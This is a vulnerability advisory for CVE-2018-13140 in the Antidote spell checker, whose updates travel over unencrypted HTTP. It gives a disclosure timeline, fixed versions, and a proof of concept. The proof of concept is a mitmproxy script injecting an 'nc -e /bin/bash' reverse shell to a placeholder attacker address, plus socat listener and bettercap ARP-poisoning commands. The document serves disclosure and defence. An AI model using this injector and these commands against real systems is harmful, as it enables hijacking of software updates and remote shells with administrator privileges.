Antidote 9.5.1 Code Execution

`# [CVE-2018-13140] Antidote Remote Code Execution against the update  
component  
  
## Description  
  
Antidote is a spell checker software for Windows, Linux macOS operating  
system.  
  
**Threat**  
  
The application is affected by a remote code execution against the  
update component. It leads to code execution with high privileges  
against the targeted system.  
  
**Expectation**  
  
Network operations like an update component should be held through  
encrypted communication channels like TLS, to prevent all sorts of  
hijacking attacks.  
  
## CVSS Score:  
  
**CVE ID**: CVE-2018-13140  
  
**Access Vector**: remote  
  
**Security Risk**: high  
  
**Vulnerability**: CWE-311  
  
**CVSS Base Score**: 8.2  
  
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:L  
  
# Details  
  
Antidote downloads its installation packages over HTTP protocol, without  
any kind of encryption such as TLS.  
  
An attacker can thus perform a Man-In-The-Middle attack to intercept the  
update request / response in order to replace or patch the downloaded  
package.  
  
Moreover, after the download is done, the component asks for  
administrator rights to install the update, allowing thus an attacker to  
run the payload as an administrator with privileged rights.  
  
  
## Proof of Concept  
  
We developed a simple `mitm-proxy` module to exploit this vulnerability,  
here the python source code:  
  
```  
#(this script works best with --anticache)  
  
from mitmproxy import http  
  
MATCH = "export "  
CMD_TO_INJECT = "nc -e /bin/bash IP_OF_ATTACKER 4444&"  
  
class Injector:  
def response(self, flow: http.HTTPFlow) -> None:  
if MATCH.encode() in flow.response.content:  
print("Match detected")  
cmd = "\n%s\n%s" % (CMD_TO_INJECT, MATCH)  
flow.response.content =  
flow.response.content.replace(MATCH.encode(),cmd.encode())  
  
addons = [Injector()]  
```  
  
The previous script is looking for the `export ` string for each HTTP  
responses, in order to replace it with a simple command to give the  
attacker a remote reverse shell. Thereafter, when the update script is  
called by the update software component, the simple command is firstly  
run as a simple user. The update script asks then user for the  
administrator password, allowing our command to be executed as  
administrator.  
  
In fact, we could thus obtain two remote shells (as simple user and  
administrator), using a multithreaded listening TCP handler:  
  
* The first one when the script is started (user privileges) ;  
  
* The second one after the victim types his credentials (administrator  
privileges).  
  
The following commands are used to exploit the vulnerability, using a  
Man-In-The-Middle attack:  
  
* a multithreaded `socat` TCP listener, to receive the victim reverse  
connection with low privileges against the target:  
  
```  
socat - TCP-LISTEN:4444,fork  
```  
  
* the mitm-proxy with our dedicated module:  
  
```  
mitmproxy -s antidote.py --anticache --listen-port 9090 -m transparent  
```  
  
* ARP Cache Poisoning using bettercap and redirecting traffic to mitm-proxy:  
  
```  
bettercap -I YOUR_NETWORK_INTERFACE -T VICTIM_IP_ADDRESS --custom-proxy  
YOUR_IP_ADDRESS --custom-proxy-port 9090 -S ARP  
```  
  
When the Antidote software asks for an update, `mitmproxy` will  
automatically patch the update component using our reverse shell payload  
included.  
  
After the end of the download, the user will press `install`, leading to  
the execution of the two payloads, as described.  
  
## Timeline (dd/mm/yyyy)  
  
Congratulations to Druide for handling this security response very  
quickly and professionally:  
  
* 30/04/2018 : Initial discovery.  
* 30/04/2018 : Contact acknowledgment.  
* 11/05/2018 : Detailed report communicated to Druide.  
* 12/05/2018 : Technical response, confirming the vulnerability and  
stating which versions are affected (Windows, Linux, but not Mac OS).  
* 08/06/2018 : Follow up e-mail from Druide informing about the patching  
development status and roadmap.  
* 23/06/2018 : Druide informs us of the fixed versions and suggest a  
disclosure date on 31/07/2018 to let enough time for customers to patch.  
* 21/09/2018 : Disclosure.  
  
## Fixes  
  
* Antidote 9.5.2 (Windows/Linux)  
* Antidote 8.5.2 (Windows)  
* Antidote HD 6.1.2 (Windows)  
  
## Affected versions  
  
* All Antidote Windows/Linux versions <= 9.5.1  
* Mac OS versions are unaffected (already using TLS encryption for updates)  
  
## Credits  
  
* Mickael KARATEKIN <m.karatekin -at- sysdream.com>  
  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
`